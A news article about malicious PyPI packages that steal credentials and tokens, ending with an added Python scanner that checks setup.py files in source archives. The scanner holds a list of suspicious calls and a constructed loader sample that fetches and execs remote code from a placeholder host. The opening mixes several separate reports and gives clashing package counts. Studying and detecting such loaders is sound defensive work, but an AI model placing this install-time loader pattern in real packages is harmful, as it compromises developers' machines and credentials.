PyPI Python Packages are the New Source of Supply Chain Attacks

Check Point's CloudGuard Spectral has detected 10 malicious packages on PyPI, the leading package index used by Python developers.

A dozen malicious Python packages were uploaded to the PyPI repository this weekend in a typosquatting attack whose payload launches DDoS attacks against a Counter-Strike 1.6 server. The Python Package Index (PyPI) is a repository of open-source software packages that developers can pull into their Python projects to build complex applications with minimal effort. Separately, on August 8, Check Point published a report on ten malicious packages in PyPI, the most popular Python repository among software developers. These packages were designed to steal developers' data and credentials.

The malicious packages contained code nearly identical to the legitimate 'requests' library, but were modified to write a one-line Python script to a temporary file; that script fetches a next-stage script, which in turn downloads and executes the final payload.

Called 'W4SP Stealer', the final payload is a Python trojan that collects saved browser cookies and passwords as well as Discord tokens, and exfiltrates them to the threat actor via a Discord webhook.

Ten PyPI packages were used to steal credentials

The malicious PyPI packages discovered by Check Point and outlined in its report are:

Ascii2text – Mimics 'art', a popular ASCII-art library for Python, reusing its description minus the release details. Its code fetches a malicious script that searches for locally stored passwords and exfiltrates them via a Discord webhook.

Pyg-utils, Pymocks, PyProto2 – All three target AWS credentials and closely resemble a set of packages Sonatype discovered in June. The first even connects to the same domain (pygrata.com), while the other two contact pymocks.com.

Test-async – A package with a vague description that fetches malicious code from a remote resource and notifies a Discord channel that a new infection has been established.

Free-net-VPN and Free-net-vpn2 – Credential harvesters that send stolen user credentials to a host whose name is maintained through a dynamic DNS service.

Zlibsrc – Mimics the zlib project; the package contains a script that downloads and runs a malicious file from an external source.

Browserdiv – Targets the credentials of web designers and developers, using Discord webhooks for data exfiltration.

WINRPCexploit – A credential-stealing package that promises to automate exploitation of a Windows RPC vulnerability. When executed, it instead uploads the host's environment variables, which commonly contain credentials, to a remote site under the attacker's control.

Background

PyPI is the leading Python repository and the one most commonly used by Python developers. Every Python developer knows the daily 'pip install' routine for pulling in the software they need.

PyPI helps developers find and install software developed and shared by others in the Python community. The platform is free to use and developers rely on it daily. According to its website, PyPI has over 612,240 active users working on 391,325 projects with 3,664,724 releases.

What many users do not realize is that this simple one-line command can put them at elevated risk. When 'pip install' resolves to a source distribution, the installer runs the package's setup.py, which is ordinary Python executed on the installing machine with the installer's privileges. Whatever the author placed in that script runs at install time, before the package is ever imported, and with no prompt to the user.
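The loader pattern described above (a setup.py that drops a one-line script to a temporary file, fetches a next stage and runs it) is exactly what a practitioner wants to catch before installation. The following added example is not from the Check Point report or any of the packages it names: it builds two constructed sdist tarballs in memory, one with a setup.py modelled on that loader and one with plain packaging metadata, and statically scans setup.py with Python's `ast` module without ever executing it. The package name "reqeusts", the version numbers, and the `example.invalid` URL are placeholders.

```python
"""Added example: statically scan a PyPI sdist's setup.py for install-time
loader behaviour (network fetch, temp-file drop, shelling out) before pip
ever runs it.  Sample packages and URLs below are constructed placeholders."""
import ast
import io
import tarfile

# Calls that have no business in the setup.py of a pure-Python library.
SUSPICIOUS_CALLS = {
    "urlopen", "urlretrieve",                 # fetching a next stage
    "system", "popen", "Popen", "check_output",  # shelling out to run it
    "exec", "eval", "b64decode",              # running or decoding a hidden payload
    "NamedTemporaryFile", "mkstemp",          # dropping a script to disk
}
SUSPICIOUS_IMPORTS = {"urllib", "requests", "subprocess", "base64", "tempfile", "socket"}

# Constructed sample: a setup.py modelled on the temp-file loader pattern.
MALICIOUS_SETUP_PY = '''\
from setuptools import setup
import tempfile, os, urllib.request

# one-liner that fetches the next stage (placeholder host, not a real URL)
stage = "import urllib.request;exec(urllib.request.urlopen('http://example.invalid/s.py').read())"
with tempfile.NamedTemporaryFile("w", suffix=".py", delete=False) as f:
    f.write(stage)
os.system("python " + f.name)

setup(name="reqeusts", version="2.28.1", py_modules=["reqeusts"])
'''

# Constructed sample: an ordinary setup.py containing only packaging metadata.
BENIGN_SETUP_PY = '''\
from setuptools import setup, find_packages
setup(name="art", version="5.7", packages=find_packages())
'''


def build_sdist(dirname: str, setup_py: str) -> bytes:
    """Pack a setup.py into an in-memory .tar.gz shaped like a PyPI sdist."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tar:
        data = setup_py.encode()
        info = tarfile.TarInfo(name=f"{dirname}/setup.py")
        info.size = len(data)
        tar.addfile(info, io.BytesIO(data))
    return buf.getvalue()


def _call_name(node: ast.Call) -> str:
    """Final attribute or name being called, e.g. 'urlopen' for urllib.request.urlopen(...)."""
    func = node.func
    if isinstance(func, ast.Attribute):
        return func.attr
    if isinstance(func, ast.Name):
        return func.id
    return ""


def scan_setup_py(source: str) -> list[str]:
    """List suspicious imports and calls in setup.py source; the code is parsed, never run."""
    findings = []
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Import):
            mods = [alias.name for alias in node.names]
        elif isinstance(node, ast.ImportFrom):
            mods = [node.module or ""]
        else:
            mods = []
        for mod in mods:
            if mod.split(".")[0] in SUSPICIOUS_IMPORTS:
                findings.append(f"line {node.lineno}: import {mod}")
        if isinstance(node, ast.Call) and _call_name(node) in SUSPICIOUS_CALLS:
            findings.append(f"line {node.lineno}: call {_call_name(node)}()")
    return sorted(findings)


def scan_sdist(archive: bytes) -> list[str]:
    """Locate setup.py inside an sdist tarball and scan it without executing anything."""
    with tarfile.open(fileobj=io.BytesIO(archive), mode="r:gz") as tar:
        for member in tar.getmembers():
            if member.name == "setup.py" or member.name.endswith("/setup.py"):
                return scan_setup_py(tar.extractfile(member).read().decode())
    return ["no setup.py found (wheel or pyproject-only sdist)"]


if __name__ == "__main__":
    for label, dirname, src in (("malicious", "reqeusts-2.28.1", MALICIOUS_SETUP_PY),
                                ("benign", "art-5.7", BENIGN_SETUP_PY)):
        print(label, scan_sdist(build_sdist(dirname, src)))
```

To apply this to a real package, fetch the archive without installing it (`pip download --no-deps --no-binary :all: <name>`) and pass the bytes to `scan_sdist`. The check is a triage aid, not proof of safety: calls built through `getattr` or string concatenation will slip past a name match. The stronger control is to avoid running setup.py at all by installing only wheels (`pip install --only-binary :all: <name>`) and pinning hashes for what you do install.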

Analytics Insight
www.analyticsinsight.net